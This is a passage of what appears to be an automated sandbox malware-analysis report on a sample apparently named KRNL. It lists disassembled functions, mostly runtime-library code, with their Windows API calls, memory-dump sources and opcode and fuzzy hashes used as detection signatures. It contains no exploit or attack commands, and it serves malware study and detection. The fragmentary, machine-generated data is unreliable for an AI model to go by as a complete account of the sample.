                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F022722003049FCB245F79D881A7A7BD1EB80778B05C62CFA014B6C0D6B5AD02C650
                                                                                                                                                                                                                                                          Function 006FD1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006F80E1: EnterCriticalSection.KERNEL32(?,?,006FC5F8,?,00719290,00000008,006FC4EA,?,?,?), ref: 006F80F0
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(006FD1B0,00000001,00719310,0000000C,006FCB11,-00000050), ref: 006FD1F5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                          • Opcode ID: 07c8cab62339de1180c1d392d72e99001bee6c7951470e7fade13b5f59c3f6b9
                                                                                                                                                                                                                                                          • Instruction ID: da96962606dd1b94b48830cd522ebc4d369403ee759554733e1f505c5b9ebacf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c8cab62339de1180c1d392d72e99001bee6c7951470e7fade13b5f59c3f6b9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F03C72A00308DFDB10DF9CE842BA977E1EB44721F00C02AF5109B2E0CB795A40CF58
                                                                                                                                                                                                                                                          Function 00701915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701960,00000001,?,?,?,00701385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0070194C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: 785a144e102671f3d913a69fc479e7caa53a33b6169d84f793196eec1efce526
                                                                                                                                                                                                                                                          • Instruction ID: cc4e46ceb32d828bf8313aeeaa280b46722f7e3287929dd0682e6df1eadf0b0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 785a144e102671f3d913a69fc479e7caa53a33b6169d84f793196eec1efce526
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF0EC3530034997CB049F39DC656777FE4EFC1B60F474058EA058B291C675A842C7A4
                                                                                                                                                                                                                                                          Function 006FCC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,006F6E33,?,20001004,00000000,00000002,?,?,006F5D3D), ref: 006FCC49
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                          • Opcode ID: da587e23328b0621dbe0795a717dd359158bc33bfa6e22d7aab5e2adff82e72f
                                                                                                                                                                                                                                                          • Instruction ID: 42c1771e03bb1cec51f0446f8f50e6990849ba5666d2bbaeebd43f3f7037653b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da587e23328b0621dbe0795a717dd359158bc33bfa6e22d7aab5e2adff82e72f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E04F3150122CBBCF122F64EE05EEE7E17EF44760F048025FE0966261CB359921ABE8
                                                                                                                                                                                                                                                          Function 006EF8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 006EF8E2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: 112ccca70048720e565e0f1552a8269bc65b6fcb558237d09f7f1520aa802cf6
                                                                                                                                                                                                                                                          • Instruction ID: 7fbe9d442c845ac6af27e687fd1051e248fffa33c0c8192c91b78da7d1a10c4c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 112ccca70048720e565e0f1552a8269bc65b6fcb558237d09f7f1520aa802cf6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          Function 006FD8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 9af7853dae52c762f9401ec03bdd79c4774c18be2c4ed256b6f60fc09e0e8935
                                                                                                                                                                                                                                                          • Instruction ID: c375ff140b6971ebc35ebbe09961bd17162882de1faf97dc0cb48127829967a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af7853dae52c762f9401ec03bdd79c4774c18be2c4ed256b6f60fc09e0e8935
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2A002706011418B57504F7959152493599A5455D1705C0655C45C61A4DA3854549F5D
                                                                                                                                                                                                                                                          Function 0070AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                          • Opcode ID: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction ID: 341c42c84f5c250b81d4d878749770d96cfdb581091847031405732ae010ab71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D71E272A00749FBDF219F64CC41FAF77EADF45310F294259E904A72D1EA799C008766
                                                                                                                                                                                                                                                          Function 006EFE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 006EFE70
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EFE9C
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 006EFEDB
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EFEF8
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006EFF37
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EFF54
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006EFF96
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006EFFB9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                                          • Opcode ID: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
                                                                                                                                                                                                                                                          • Instruction ID: 8a514d65a2c29b63ce07548d9fda97788de5ad821e55bb1fb3a438822cf466fa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6051BE72A0138AAFEF204F66CC45FEB7BAAEF41750F248439F914DA290DB319C108B54
                                                                                                                                                                                                                                                          Function 006FEE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                          • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                          • Instruction ID: 53a2b6661e2d74c74cfcfbc20e3de9288081ca08ff30eea60494de05eccb8fe2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB15672A01259EFDB21CF24CC91BFE7FA6EF55310F144165EA44AB382DA759901C7A0
                                                                                                                                                                                                                                                          Function 006F0D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0D77
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006F0D7F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0E08
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006F0E33
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006F0E88
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 558e0431efedae65852da3528f575500a9fc5d0fa933715d3574d6cf84de41da
                                                                                                                                                                                                                                                          • Instruction ID: 694c281a61097a4ca51bfcc6b9b39304c963aa9d2f759b1aa154b3f46cf189b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 558e0431efedae65852da3528f575500a9fc5d0fa933715d3574d6cf84de41da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9341C074A0021C9BDF10DF68C884AFEBBA7AF44314F148959EA149B393DB35AE11CB94
                                                                                                                                                                                                                                                          Function 006E3C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3CA5
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006E3CBF
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3CE0
                                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 006E3D92
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3DD8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                          • String ID: e.q
                                                                                                                                                                                                                                                          • API String ID: 3087743877-2639829087
                                                                                                                                                                                                                                                          • Opcode ID: 63aa61f81adc38af409f08ce9777fe27e0def00ca64afffe91047b8aec370fbb
                                                                                                                                                                                                                                                          • Instruction ID: 1f729a07bbbb5adc5d9fdeb5a5269754e35ec728f4d795bcd7b305397da966ec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63aa61f81adc38af409f08ce9777fe27e0def00ca64afffe91047b8aec370fbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0413971D013648FCB10DF99D845BAEB7B2FF44B20F188219D8156B391DB79AA01CF95
                                                                                                                                                                                                                                                          Function 006F0080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F0086
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006F0094
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006F00A5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                          • Opcode ID: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
                                                                                                                                                                                                                                                          • Instruction ID: e9b8ae64561f45ce0c7949f3ae10230d7d786c665f964b454091b45a6a29c701
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCD09EBA5522106B83115FBC7C09CC93EA9FA09711301C152F441E22D0DA7C65419AED
                                                                                                                                                                                                                                                          Function 00704F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
